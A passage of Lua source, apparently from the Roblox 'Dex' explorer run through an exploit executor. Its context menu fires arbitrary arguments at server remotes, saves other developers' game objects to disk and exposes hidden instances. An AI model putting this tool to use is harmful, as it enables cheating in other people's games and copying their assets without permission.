end,"Script","Number","String","Color3","Vector3","Vector2","UDim2","NumberRange") end) CurrentRemoteWindow.MainWindow.Ok.MouseButton1Up:connect(function() if CurrentRemoteWindow and inst.Parent ~= nil then local MyArguments = {} for i,v in pairs(ArgumentList:GetChildren()) do table.insert(MyArguments,ToValue(v.Value.Text,v.Type.Text)) end if inst:IsA("RemoteFunction") then if displayValues then spawn(function() local myResults = inst:InvokeServer(unpack(MyArguments)) if myResults then CreateTableCaution("Remote Caller",myResults) else CreateCaution("Remote Caller","This remote did not return anything.") end end) else spawn(function() inst:InvokeServer(unpack(MyArguments)) end) end else inst:FireServer(unpack(MyArguments)) end CurrentRemoteWindow:Destroy() CurrentRemoteWindow = nil end end) CurrentRemoteWindow.MainWindow.Add.MouseButton1Up:connect(function() if CurrentRemoteWindow then local newArgument = ArgumentTemplate:Clone() newArgument.Position = UDim2.new(0,0,0,#ArgumentList:GetChildren() * 20) newArgument.Parent = ArgumentList ArgumentList.CanvasSize = UDim2.new(0,0,0,#ArgumentList:GetChildren() * 20) newArgument.Visible = true newArgument.Type.MouseButton1Down:connect(function() createDDown(newArgument.Type,function(choice) newArgument.Type.Text = choice end,"Script","Number","String","Color3","Vector3","Vector2","UDim2","NumberRange") end) end end) CurrentRemoteWindow.MainWindow.Subtract.MouseButton1Up:connect(function() if CurrentRemoteWindow then if #ArgumentList:GetChildren() > 1 then ArgumentList:GetChildren()[#ArgumentList:GetChildren()]:Destroy() ArgumentList.CanvasSize = UDim2.new(0,0,0,#ArgumentList:GetChildren() * 20) end end end) CurrentRemoteWindow.MainWindow.Cancel.MouseButton1Up:connect(function() if CurrentRemoteWindow then CurrentRemoteWindow:Destroy() CurrentRemoteWindow = nil end end) CurrentRemoteWindow.MainWindow.DisplayReturned.MouseButton1Up:connect(function() if displayValues then displayValues = false CurrentRemoteWindow.MainWindow.DisplayReturned.enabled.Visible = false else displayValues = true CurrentRemoteWindow.MainWindow.DisplayReturned.enabled.Visible = true end end) end function PromptSaveInstance(inst) if not SaveInstance and not _G.SaveInstance then CreateCaution("SaveInstance Missing","You do not have the SaveInstance function installed. Please go to RaspberryPi's thread to retrieve it.") return end if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil if explorerPanel.Parent:FindFirstChild("SaveInstanceOverwriteCaution") then explorerPanel.Parent.SaveInstanceOverwriteCaution:Destroy() end end CurrentSaveInstanceWindow = SaveInstanceWindow:Clone() CurrentSaveInstanceWindow.Parent = explorerPanel.Parent CurrentSaveInstanceWindow.Visible = true local filename = CurrentSaveInstanceWindow.MainWindow.FileName local saveObjects = true local overwriteCaution = false CurrentSaveInstanceWindow.MainWindow.Save.MouseButton1Up:connect(function() if readfile and getelysianpath then if readfile(getelysianpath()..filename.Text..".rbxmx") then if not overwriteCaution then overwriteCaution = true local newCaution = ConfirmationWindow:Clone() newCaution.Name = "SaveInstanceOverwriteCaution" newCaution.MainWindow.Desc.Text = "The file, "..filename.Text..".rbxmx, already exists. Overwrite?" newCaution.Parent = explorerPanel.Parent newCaution.Visible = true newCaution.MainWindow.Yes.MouseButton1Up:connect(function() ypcall(function() SaveInstance(inst,filename.Text..".rbxmx",not saveObjects) end) overwriteCaution = false newCaution:Destroy() if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil end end) newCaution.MainWindow.No.MouseButton1Up:connect(function() overwriteCaution = false newCaution:Destroy() end) end else ypcall(function() SaveInstance(inst,filename.Text..".rbxmx",not saveObjects) end) if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil if explorerPanel.Parent:FindFirstChild("SaveInstanceOverwriteCaution") then explorerPanel.Parent.SaveInstanceOverwriteCaution:Destroy() end end end else ypcall(function() if SaveInstance then SaveInstance(inst,filename.Text..".rbxmx",not saveObjects) else _G.SaveInstance(inst,filename.Text,not saveObjects) end end) if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil if explorerPanel.Parent:FindFirstChild("SaveInstanceOverwriteCaution") then explorerPanel.Parent.SaveInstanceOverwriteCaution:Destroy() end end end end) CurrentSaveInstanceWindow.MainWindow.Cancel.MouseButton1Up:connect(function() if CurrentSaveInstanceWindow then CurrentSaveInstanceWindow:Destroy() CurrentSaveInstanceWindow = nil if explorerPanel.Parent:FindFirstChild("SaveInstanceOverwriteCaution") then explorerPanel.Parent.SaveInstanceOverwriteCaution:Destroy() end end end) CurrentSaveInstanceWindow.MainWindow.SaveObjects.MouseButton1Up:connect(function() if saveObjects then saveObjects = false CurrentSaveInstanceWindow.MainWindow.SaveObjects.enabled.Visible = false else saveObjects = true CurrentSaveInstanceWindow.MainWindow.SaveObjects.enabled.Visible = true end end) end function DestroyRightClick() if currentRightClickMenu then currentRightClickMenu:Destroy() currentRightClickMenu = nil end if CurrentInsertObjectWindow and CurrentInsertObjectWindow.Visible then CurrentInsertObjectWindow.Visible = false end end function rightClickMenu(sObj) local mouse = game:GetService("Players").LocalPlayer:GetMouse() currentRightClickMenu = CreateRightClickMenu( {"Cut","Copy","Paste Into","Duplicate","Delete","Group","Ungroup","Select Children","Teleport To","Insert Part","Insert Object","View Script","Save Instance","Call Function","Call Remote"}, "", false, function(option) if option == "Cut" then if not Option.Modifiable then return end clipboard = {} local list = Selection.List local cut = {} for i = 1,#list do local obj = list[i]:Clone() if obj then table.insert(clipboard,obj) table.insert(cut,list[i]) end end for i = 1,#cut do pcall(delete,cut[i]) end updateActions() elseif option == "Copy" then if not Option.Modifiable then return end clipboard = {} local list = Selection.List for i = 1,#list do table.insert(clipboard,list[i]:Clone()) end updateActions() elseif option == "Paste Into" then if not Option.Modifiable then return end local parent = Selection.List[1] or workspace for i = 1,#clipboard do clipboard[i]:Clone().Parent = parent end elseif option == "Duplicate" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do list[i]:Clone().Parent = Selection.List[1].Parent or workspace end elseif option == "Delete" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do pcall(delete,list[i]) end Selection:Set({}) elseif option == "Group" then if not Option.Modifiable then return end local newModel = Instance.new("Model") local list = Selection:Get() newModel.Parent = Selection.List[1].Parent or workspace for i = 1,#list do list[i].Parent = newModel end Selection:Set({}) elseif option == "Ungroup" then if not Option.Modifiable then return end local ungrouped = {} local list = Selection:Get() for i = 1,#list do if list[i]:IsA("Model") then for i2,v2 in pairs(list[i]:GetChildren()) do v2.Parent = list[i].Parent or workspace table.insert(ungrouped,v2) end pcall(delete,list[i]) end end Selection:Set({}) if SettingsRemote:Invoke("SelectUngrouped") then for i,v in pairs(ungrouped) do Selection:Add(v) end end elseif option == "Select Children" then if not Option.Modifiable then return end local list = Selection:Get() Selection:Set({}) Selection:StopUpdates() for i = 1,#list do for i2,v2 in pairs(list[i]:GetChildren()) do Selection:Add(v2) end end Selection:ResumeUpdates() elseif option == "Teleport To" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do if list[i]:IsA("BasePart") then pcall(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = list[i].CFrame end) break end end elseif option == "Insert Part" then if not Option.Modifiable then return end local insertedParts = {} local list = Selection:Get() for i = 1,#list do pcall(function() local newPart = Instance.new("Part") newPart.Parent = list[i] newPart.CFrame = CFrame.new(game:GetService("Players").LocalPlayer.Character.Head.Position) + Vector3.new(0,3,0) table.insert(insertedParts,newPart) end) end elseif option == "Save Instance" then if not Option.Modifiable then return end local list = Selection:Get() if #list == 1 then list[1].Archivable = true ypcall(function()PromptSaveInstance(list[1]:Clone())end) elseif #list > 1 then local newModel = Instance.new("Model") newModel.Name = "SavedInstances" for i = 1,#list do ypcall(function() list[i].Archivable = true list[i]:Clone().Parent = newModel end) end PromptSaveInstance(newModel) end elseif option == "Call Remote" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do if list[i]:IsA("RemoteFunction") or list[i]:IsA("RemoteEvent") then PromptRemoteCaller(list[i]) break end end elseif option == "View Script" then if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do if list[i]:IsA("LocalScript") or list[i]:IsA("ModuleScript") then ScriptEditorEvent:Fire(list[i]) end end end end) currentRightClickMenu.Parent = explorerPanel.Parent currentRightClickMenu.Position = UDim2.new(0,mouse.X,0,mouse.Y) if currentRightClickMenu.AbsolutePosition.X + currentRightClickMenu.AbsoluteSize.X > explorerPanel.AbsolutePosition.X + explorerPanel.AbsoluteSize.X then currentRightClickMenu.Position = UDim2.new(0, explorerPanel.AbsolutePosition.X + explorerPanel.AbsoluteSize.X - currentRightClickMenu.AbsoluteSize.X, 0, mouse.Y) end end local function cancelReparentDrag()end local function cancelSelectDrag()end do local listEntries = {} local nameConnLookup = {} local mouseDrag = Create('ImageButton',{ Name = "MouseDrag"; Position = UDim2.new(-0.25,0,-0.25,0); Size = UDim2.new(1.5,0,1.5,0); Transparency = 1; AutoButtonColor = false; Active = true; ZIndex = 10; }) local function dragSelect(last,add,button) local connDrag local conUp conDrag = mouseDrag.MouseMoved:connect(function(x,y) local pos = Vector2.new(x,y) - listFrame.AbsolutePosition local size = listFrame.AbsoluteSize if pos.x < 0 or pos.x > size.x or pos.y < 0 or pos.y > size.y then return end local i = math.ceil(pos.y/ENTRY_BOUND) + scrollBar.ScrollIndex -- Mouse may have made a large step, so interpolate between the -- last index and the current. for n = ilast and i or last do local node = TreeList[n] if node then if add then Selection:Add(node.Object) else Selection:Remove(node.Object) end end end last = i end) function cancelSelectDrag() mouseDrag.Parent = nil conDrag:disconnect() conUp:disconnect() function cancelSelectDrag()end end conUp = mouseDrag[button]:connect(cancelSelectDrag) mouseDrag.Parent = GetScreen(listFrame) end local function dragReparent(object,dragGhost,clickPos,ghostOffset) local connDrag local conUp local conUp2 local parentIndex = nil local dragged = false local parentHighlight = Create('Frame',{ Transparency = 1; Visible = false; Create('Frame',{ BorderSizePixel = 0; BackgroundColor3 = Color3.new(0,0,0); BackgroundTransparency = 0.1; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,0,1); }); Create('Frame',{ BorderSizePixel = 0; BackgroundColor3 = Color3.new(0,0,0); BackgroundTransparency = 0.1; Position = UDim2.new(1,0,0,0); Size = UDim2.new(0,1,1,0); }); Create('Frame',{ BorderSizePixel = 0; BackgroundColor3 = Color3.new(0,0,0); BackgroundTransparency = 0.1; Position = UDim2.new(0,0,1,0); Size = UDim2.new(1,0,0,1); }); Create('Frame',{ BorderSizePixel = 0; BackgroundColor3 = Color3.new(0,0,0); BackgroundTransparency = 0.1; Position = UDim2.new(0,0,0,0); Size = UDim2.new(0,1,1,0); }); }) SetZIndex(parentHighlight,9) conDrag = mouseDrag.MouseMoved:connect(function(x,y) local dragPos = Vector2.new(x,y) if dragged then local pos = dragPos - listFrame.AbsolutePosition local size = listFrame.AbsoluteSize parentIndex = nil parentHighlight.Visible = false if pos.x >= 0 and pos.x <= size.x and pos.y >= 0 and pos.y <= size.y + ENTRY_SIZE*2 then local i = math.ceil(pos.y/ENTRY_BOUND-2) local node = TreeList[i + scrollBar.ScrollIndex] if node and node.Object ~= object and not object:IsAncestorOf(node.Object) then parentIndex = i local entry = listEntries[i] if entry then parentHighlight.Visible = true parentHighlight.Position = UDim2.new(0,1,0,entry.AbsolutePosition.y-listFrame.AbsolutePosition.y) parentHighlight.Size = UDim2.new(0,size.x-4,0,entry.AbsoluteSize.y) end end end dragGhost.Position = UDim2.new(0,dragPos.x+ghostOffset.x,0,dragPos.y+ghostOffset.y) elseif (clickPos-dragPos).magnitude > 8 then dragged = true SetZIndex(dragGhost,9) dragGhost.IndentFrame.Transparency = 0.25 dragGhost.IndentFrame.EntryText.TextColor3 = GuiColor.TextSelected dragGhost.Position = UDim2.new(0,dragPos.x+ghostOffset.x,0,dragPos.y+ghostOffset.y) dragGhost.Parent = GetScreen(listFrame) parentHighlight.Parent = listFrame end end) function cancelReparentDrag() mouseDrag.Parent = nil conDrag:disconnect() conUp:disconnect() conUp2:disconnect() dragGhost:Destroy() parentHighlight:Destroy() function cancelReparentDrag()end end local wasSelected = Selection.Selected[object] if not wasSelected and Option.Selectable then Selection:Set({object}) end conUp = mouseDrag.MouseButton1Up:connect(function() cancelReparentDrag() if dragged then if parentIndex then local parentNode = TreeList[parentIndex + scrollBar.ScrollIndex] if parentNode then parentNode.Expanded = true local parentObj = parentNode.Object local function parent(a,b) a.Parent = b end if Option.Selectable then local list = Selection.List for i = 1,#list do pcall(parent,list[i],parentObj) end else pcall(parent,object,parentObj) end end end else -- do selection click if wasSelected and Option.Selectable then Selection:Set({}) end end end) conUp2 = mouseDrag.MouseButton2Down:connect(function() cancelReparentDrag() end) mouseDrag.Parent = GetScreen(listFrame) end local entryTemplate = Create('ImageButton',{ Name = "Entry"; Transparency = 1; AutoButtonColor = false; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,0,ENTRY_SIZE); Create('Frame',{ Name = "IndentFrame"; BackgroundTransparency = 1; BackgroundColor3 = GuiColor.Selected; BorderColor3 = GuiColor.BorderSelected; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,1,0); Create(Icon('ImageButton',0),{ Name = "Expand"; AutoButtonColor = false; Position = UDim2.new(0,-GUI_SIZE,0.5,-GUI_SIZE/2); Size = UDim2.new(0,GUI_SIZE,0,GUI_SIZE); }); Create(Icon(nil,0),{ Name = "ExplorerIcon"; Position = UDim2.new(0,2+ENTRY_PADDING,0.5,-GUI_SIZE/2); Size = UDim2.new(0,GUI_SIZE,0,GUI_SIZE); }); Create('TextLabel',{ Name = "EntryText"; BackgroundTransparency = 1; TextColor3 = GuiColor.Text; TextXAlignment = 'Left'; TextYAlignment = 'Center'; Font = FONT; FontSize = FONT_SIZE; Text = ""; Position = UDim2.new(0,2+ENTRY_SIZE+4,0,0); Size = UDim2.new(1,-2,1,0); }); }); }) function scrollBar.UpdateCallback(self) for i = 1,self.VisibleSpace do local node = TreeList[i + self.ScrollIndex] if node then local entry = listEntries[i] if not entry then entry = Create(entryTemplate:Clone(),{ Position = UDim2.new(0,2,0,ENTRY_BOUND*(i-1)+2); Size = UDim2.new(0,nodeWidth,0,ENTRY_SIZE); ZIndex = listFrame.ZIndex; }) listEntries[i] = entry local expand = entry.IndentFrame.Expand expand.MouseEnter:connect(function() local node = TreeList[i + self.ScrollIndex] if #node > 0 then if node.Expanded then Icon(expand,NODE_EXPANDED_OVER) else Icon(expand,NODE_COLLAPSED_OVER) end end end) expand.MouseLeave:connect(function() local node = TreeList[i + self.ScrollIndex] if #node > 0 then if node.Expanded then Icon(expand,NODE_EXPANDED) else Icon(expand,NODE_COLLAPSED) end end end) expand.MouseButton1Down:connect(function() local node = TreeList[i + self.ScrollIndex] if #node > 0 then node.Expanded = not node.Expanded if node.Object == explorerPanel.Parent and node.Expanded then CreateCaution("Warning","Please be careful when editing instances inside here, this is like the System32 of Dex and modifying objects here can break Dex.") end -- use raw update so the list updates instantly rawUpdateList() end end) entry.MouseButton1Down:connect(function(x,y) local node = TreeList[i + self.ScrollIndex] DestroyRightClick() if GetAwaitRemote:Invoke() then bindSetAwaiting:Fire(node.Object) return end if not HoldingShift then lastSelectedNode = i + self.ScrollIndex end if HoldingShift and not filteringWorkspace() then if lastSelectedNode then if i + self.ScrollIndex - lastSelectedNode > 0 then Selection:StopUpdates() for i2 = 1, i + self.ScrollIndex - lastSelectedNode do local newNode = TreeList[lastSelectedNode + i2] if newNode then Selection:Add(newNode.Object) end end Selection:ResumeUpdates() else Selection:StopUpdates() for i2 = i + self.ScrollIndex - lastSelectedNode, 1 do local newNode = TreeList[lastSelectedNode + i2] if newNode then Selection:Add(newNode.Object) end end Selection:ResumeUpdates() end end return end if HoldingCtrl then if Selection.Selected[node.Object] then Selection:Remove(node.Object) else Selection:Add(node.Object) end return end if Option.Modifiable then local pos = Vector2.new(x,y) dragReparent(node.Object,entry:Clone(),pos,entry.AbsolutePosition-pos) elseif Option.Selectable then if Selection.Selected[node.Object] then Selection:Set({}) else Selection:Set({node.Object}) end dragSelect(i+self.ScrollIndex,true,'MouseButton1Up') end end) entry.MouseButton2Down:connect(function() if not Option.Selectable then return end DestroyRightClick() curSelect = entry local node = TreeList[i + self.ScrollIndex] if GetAwaitRemote:Invoke() then bindSetAwaiting:Fire(node.Object) return end if not Selection.Selected[node.Object] then Selection:Set({node.Object}) end end) entry.MouseButton2Up:connect(function() if not Option.Selectable then return end local node = TreeList[i + self.ScrollIndex] if checkMouseInGui(curSelect) then rightClickMenu(node.Object) end end) entry.Parent = listFrame end entry.Visible = true local object = node.Object -- update expand icon if #node == 0 then entry.IndentFrame.Expand.Visible = false elseif node.Expanded then Icon(entry.IndentFrame.Expand,NODE_EXPANDED) entry.IndentFrame.Expand.Visible = true else Icon(entry.IndentFrame.Expand,NODE_COLLAPSED) entry.IndentFrame.Expand.Visible = true end -- update explorer icon Icon(entry.IndentFrame.ExplorerIcon,ExplorerIndex[object.ClassName] or 0) -- update indentation local w = (node.Depth)*(2+ENTRY_PADDING+GUI_SIZE) entry.IndentFrame.Position = UDim2.new(0,w,0,0) entry.IndentFrame.Size = UDim2.new(1,-w,1,0) -- update name change detection if nameConnLookup[entry] then nameConnLookup[entry]:disconnect() end local text = entry.IndentFrame.EntryText text.Text = object.Name nameConnLookup[entry] = node.Object.Changed:connect(function(p) if p == 'Name' then text.Text = object.Name end end) -- update selection entry.IndentFrame.Transparency = node.Selected and 0 or 1 text.TextColor3 = GuiColor[node.Selected and 'TextSelected' or 'Text'] entry.Size = UDim2.new(0,nodeWidth,0,ENTRY_SIZE) elseif listEntries[i] then listEntries[i].Visible = false end end for i = self.VisibleSpace+1,self.TotalSpace do local entry = listEntries[i] if entry then listEntries[i] = nil entry:Destroy() end end end function scrollBarH.UpdateCallback(self) for i = 1,scrollBar.VisibleSpace do local node = TreeList[i + scrollBar.ScrollIndex] if node then local entry = listEntries[i] if entry then entry.Position = UDim2.new(0,2 - scrollBarH.ScrollIndex,0,ENTRY_BOUND*(i-1)+2) end end end end Connect(listFrame.Changed,function(p) if p == 'AbsoluteSize' then rawUpdateSize() end end) local wheelAmount = 6 explorerPanel.MouseWheelForward:connect(function() if scrollBar.VisibleSpace - 1 > wheelAmount then scrollBar:ScrollTo(scrollBar.ScrollIndex - wheelAmount) else scrollBar:ScrollTo(scrollBar.ScrollIndex - scrollBar.VisibleSpace) end end) explorerPanel.MouseWheelBackward:connect(function() if scrollBar.VisibleSpace - 1 > wheelAmount then scrollBar:ScrollTo(scrollBar.ScrollIndex + wheelAmount) else scrollBar:ScrollTo(scrollBar.ScrollIndex + scrollBar.VisibleSpace) end end) end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Object detection -- Inserts `v` into `t` at `i`. Also sets `Index` field in `v`. local function insert(t,i,v) for n = #t,i,-1 do local v = t[n] v.Index = n+1 t[n+1] = v end v.Index = i t[i] = v end -- Removes `i` from `t`. Also sets `Index` field in removed value. local function remove(t,i) local v = t[i] for n = i+1,#t do local v = t[n] v.Index = n-1 t[n-1] = v end t[#t] = nil v.Index = 0 return v end -- Returns how deep `o` is in the tree. local function depth(o) local d = -1 while o do o = o.Parent d = d + 1 end return d end local connLookup = {} -- Returns whether a node would be present in the tree list local function nodeIsVisible(node) local visible = true node = node.Parent while node and visible do visible = visible and node.Expanded node = node.Parent end return visible end -- Removes an object's tree node. Called when the object stops existing in the -- game tree. local function removeObject(object) local objectNode = NodeLookup[object] if not objectNode then return end local visible = nodeIsVisible(objectNode) Selection:Remove(object,true) local parent = objectNode.Parent remove(parent,objectNode.Index) NodeLookup[object] = nil connLookup[object]:disconnect() connLookup[object] = nil if visible then updateList() elseif nodeIsVisible(parent) then updateScroll() end end -- Moves a tree node to a new parent. Called when an existing object's parent -- changes. local function moveObject(object,parent) local objectNode = NodeLookup[object] if not objectNode then return end local parentNode = NodeLookup[parent] if not parentNode then return end local visible = nodeIsVisible(objectNode) remove(objectNode.Parent,objectNode.Index) objectNode.Parent = parentNode objectNode.Depth = depth(object) local function r(node,d) for i = 1,#node do node[i].Depth = d r(node[i],d+1) end end r(objectNode,objectNode.Depth+1) insert(parentNode,#parentNode+1,objectNode) if visible or nodeIsVisible(objectNode) then updateList() elseif nodeIsVisible(objectNode.Parent) then updateScroll() end end -- ScriptContext['/Libraries/LibraryRegistration/LibraryRegistration'] -- This RobloxLocked object lets me index its properties for some reason local function check(object) return object.AncestryChanged end -- Creates a new tree node from an object. Called when an object starts -- existing in the game tree. local function addObject(object,noupdate) if script then -- protect against naughty RobloxLocked objects local s = pcall(check,object) if not s then return end end local parentNode = NodeLookup[object.Parent] if not parentNode then return end local objectNode = { Object = object; Parent = parentNode; Index = 0; Expanded = false; Selected = false; Depth = depth(object); } connLookup[object] = Connect(object.AncestryChanged,function(c,p) if c == object then if p == nil then removeObject(c) else moveObject(c,p) end end end) NodeLookup[object] = objectNode insert(parentNode,#parentNode+1,objectNode) if not noupdate then if nodeIsVisible(objectNode) then updateList() elseif nodeIsVisible(objectNode.Parent) then updateScroll() end end end local function makeObject(obj,par) local newObject = Instance.new(obj.ClassName) for i,v in pairs(obj.Properties) do ypcall(function() local newProp newProp = ToPropValue(v.Value,v.Type) newObject[v.Name] = newProp end) end newObject.Parent = par end local function writeObject(obj) local newObject = {ClassName = obj.ClassName, Properties = {}} for i,v in pairs(RbxApi.GetProperties(obj.className)) do if v["Name"] ~= "Parent" then print("thispassed") table.insert(newObject.Properties,{Name = v["Name"], Type = v["ValueType"], Value = tostring(obj[v["Name"]])}) end end return newObject end local function buildDexStorage() local localDexStorage local success,err = ypcall(function() localDexStorage = game:GetObjects("rbxasset://DexStorage.rbxm")[1] end) if success and localDexStorage then for i,v in pairs(localDexStorage:GetChildren()) do ypcall(function() v.Parent = DexStorageMain end) end end updateDexStorageListeners() --[[ local localDexStorage = readfile(getelysianpath().."DexStorage.txt")--game:GetService("CookiesService"):GetCookieValue("DexStorage") --local success,err = pcall(function() if localDexStorage then local objTable = game:GetService("HttpService"):JSONDecode(localDexStorage) for i,v in pairs(objTable) do makeObject(v,DexStorageMain) end end --end) --]] end local dexStorageDebounce = false local dexStorageListeners = {} local function updateDexStorage() if dexStorageDebounce then return end dexStorageDebounce = true wait() pcall(function() saveinstance("content//DexStorage.rbxm",DexStorageMain) end) updateDexStorageListeners() dexStorageDebounce = false --[[ local success,err = ypcall(function() local objs = {} for i,v in pairs(DexStorageMain:GetChildren()) do table.insert(objs,writeObject(v)) end writefile(getelysianpath().."DexStorage.txt",game:GetService("HttpService"):JSONEncode(objs)) --game:GetService("CookiesService"):SetCookieValue("DexStorage",game:GetService("HttpService"):JSONEncode(objs)) end) if err then CreateCaution("DexStorage Save Fail!","DexStorage broke! If you see this message, report to Raspberry Pi!") end print("hi") --]] end function updateDexStorageListeners() for i,v in pairs(dexStorageListeners) do v:Disconnect() end dexStorageListeners = {} for i,v in pairs(DexStorageMain:GetChildren()) do pcall(function() local ev = v.Changed:connect(updateDexStorage) table.insert(dexStorageListeners,ev) end) end end do NodeLookup[game:GetService("Workspace").Parent] = { Object = game:GetService("Workspace").Parent; Parent = nil; Index = 0; Expanded = true; } if DexStorageEnabled then NodeLookup[DexStorage] = { Object = DexStorage; Parent = nil; Index = 0; Expanded = true; } end if NilStorageEnabled then NodeLookup[NilStorage] = { Object = NilStorage; Parent = nil; Index = 0; Expanded = true; } end Connect(game.DescendantAdded,addObject) Connect(game.DescendantRemoving,removeObject) if DexStorageEnabled then --[[ if readfile(getelysianpath().."DexStorage.txt") == nil then writefile(getelysianpath().."DexStorage.txt","") end --]] buildDexStorage() Connect(DexStorage.DescendantAdded,addObject) Connect(DexStorage.DescendantRemoving,removeObject) Connect(DexStorage.DescendantAdded,updateDexStorage) Connect(DexStorage.DescendantRemoving,updateDexStorage) end if NilStorageEnabled then Connect(NilStorage.DescendantAdded,addObject) Connect(NilStorage.DescendantRemoving,removeObject) local currentTable = get_nil_instances() spawn(function() while wait() do if #currentTable ~= #get_nil_instances() then currentTable = get_nil_instances() --NilStorageMain:ClearAllChildren() for i,v in pairs(get_nil_instances()) do if v ~= NilStorage and v ~= DexStorage then pcall(function() v.Parent = NilStorageMain end) --[[ local newNil = v newNil.Archivable = true newNil:Clone().Parent = NilStorageMain --]] end end end end end) end local function get(o) return o:GetChildren() end local function r(o) local s,children = pcall(get,o) if s then for i = 1,#children do addObject(children[i],true) r(children[i]) end end end r(game:GetService("Workspace").Parent) if DexStorageEnabled then r(DexStorage) end if NilStorageEnabled then r(NilStorage) end scrollBar.VisibleSpace = math.ceil(listFrame.AbsoluteSize.y/ENTRY_BOUND) updateList() end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Actions local actionButtons do actionButtons = {} local totalActions = 1 local currentActions = totalActions local function makeButton(icon,over,name,vis,cond) local buttonEnabled = false local button = Create(Icon('ImageButton',icon),{ Name = name .. "Button"; Visible = Option.Modifiable and Option.Selectable; Position = UDim2.new(1,-(GUI_SIZE+2)*currentActions+2,0.25,-GUI_SIZE/2); Size = UDim2.new(0,GUI_SIZE,0,GUI_SIZE); Parent = headerFrame; }) local tipText = Create('TextLabel',{ Name = name .. "Text"; Text = name; Visible = false; BackgroundTransparency = 1; TextXAlignment = 'Right'; Font = FONT; FontSize = FONT_SIZE; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,-(GUI_SIZE+2)*totalActions,1,0); Parent = headerFrame; }) button.MouseEnter:connect(function() if buttonEnabled then button.BackgroundTransparency = 0.9 end --Icon(button,over) --tipText.Visible = true end) button.MouseLeave:connect(function() button.BackgroundTransparency = 1 --Icon(button,icon) --tipText.Visible = false end) currentActions = currentActions + 1 actionButtons[#actionButtons+1] = {Obj = button,Cond = cond} QuickButtons[#actionButtons+1] = {Obj = button,Cond = cond, Toggle = function(on) if on then buttonEnabled = true Icon(button,over) else buttonEnabled = false Icon(button,icon) end end} return button end --local clipboard = {} local function delete(o) Destroy(o) end makeButton(ACTION_EDITQUICKACCESS,ACTION_EDITQUICKACCESS,"Options",true,function()return true end).MouseButton1Click:connect(function() end) -- DELETE makeButton(ACTION_DELETE,ACTION_DELETE_OVER,"Delete",true,function() return #Selection:Get() > 0 end).MouseButton1Click:connect(function() if not Option.Modifiable then return end local list = Selection:Get() for i = 1,#list do pcall(delete,list[i]) end Selection:Set({}) end) -- PASTE makeButton(ACTION_PASTE,ACTION_PASTE_OVER,"Paste",true,function() return #Selection:Get() > 0 and #clipboard > 0 end).MouseButton1Click:connect(function() if not Option.Modifiable then return end local parent = Selection.List[1] or workspace for i = 1,#clipboard do clipboard[i]:Clone().Parent = parent end end) -- COPY makeButton(ACTION_COPY,ACTION_COPY_OVER,"Copy",true,function() return #Selection:Get() > 0 end).MouseButton1Click:connect(function() if not Option.Modifiable then return end clipboard = {} local list = Selection.List for i = 1,#list do table.insert(clipboard,list[i]:Clone()) end updateActions() end) -- CUT makeButton(ACTION_CUT,ACTION_CUT_OVER,"Cut",true,function() return #Selection:Get() > 0 end).MouseButton1Click:connect(function() if not Option.Modifiable then return end clipboard = {} local list = Selection.List local cut = {} for i = 1,#list do local obj = list[i]:Clone() if obj then table.insert(clipboard,obj) table.insert(cut,list[i]) end end for i = 1,#cut do pcall(delete,cut[i]) end updateActions() end) -- FREEZE makeButton(ACTION_FREEZE,ACTION_FREEZE,"Freeze",true,function() return true end) -- ADD/REMOVE STARRED makeButton(ACTION_ADDSTAR,ACTION_ADDSTAR_OVER,"Star",true,function() return #Selection:Get() > 0 end) -- STARRED makeButton(ACTION_STARRED,ACTION_STARRED,"Starred",true,function() return true end) -- SORT -- local actionSort = makeButton(ACTION_SORT,ACTION_SORT_OVER,"Sort") end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Option Bindables do local optionCallback = { Modifiable = function(value) for i = 1,#actionButtons do actionButtons[i].Obj.Visible = value and Option.Selectable end cancelReparentDrag() end; Selectable = function(value) for i = 1,#actionButtons do actionButtons[i].Obj.Visible = value and Option.Modifiable end cancelSelectDrag() Selection:Set({}) end; } local bindSetOption = explorerPanel:FindFirstChild("SetOption") if not bindSetOption then bindSetOption = Create('BindableFunction',{Name = "SetOption"}) bindSetOption.Parent = explorerPanel end bindSetOption.OnInvoke = function(optionName,value) if optionCallback[optionName] then Option[optionName] = value optionCallback[optionName](value) end end local bindGetOption = explorerPanel:FindFirstChild("GetOption") if not bindGetOption then bindGetOption = Create('BindableFunction',{Name = "GetOption"}) bindGetOption.Parent = explorerPanel end bindGetOption.OnInvoke = function(optionName) if optionName then return Option[optionName] else local options = {} for k,v in pairs(Option) do options[k] = v end return options end end end function SelectionVar() return Selection end Input.InputBegan:connect(function(key) if key.KeyCode == Enum.KeyCode.LeftControl then HoldingCtrl = true end if key.KeyCode == Enum.KeyCode.LeftShift then HoldingShift = true end end) Input.InputEnded:connect(function(key) if key.KeyCode == Enum.KeyCode.LeftControl then HoldingCtrl = false end if key.KeyCode == Enum.KeyCode.LeftShift then HoldingShift = false end end) while RbxApi == nil do RbxApi = GetApiRemote:Invoke() wait() end explorerFilter.Changed:connect(function(prop) if prop == "Text" then rawUpdateList() end end) CurrentInsertObjectWindow = CreateInsertObjectMenu( GetClasses(), "", false, function(option) CurrentInsertObjectWindow.Visible = false local list = SelectionVar():Get() for i = 1,#list do pcall(function() Instance.new(option,list[i]) end) end DestroyRightClick() end ) end) spawn(function() --[[ Change log: 09/18 Fixed checkbox mouseover sprite Encapsulated checkbox creation into separate method Fixed another checkbox issue 09/15 Invalid input is ignored instead of setting to default of that data 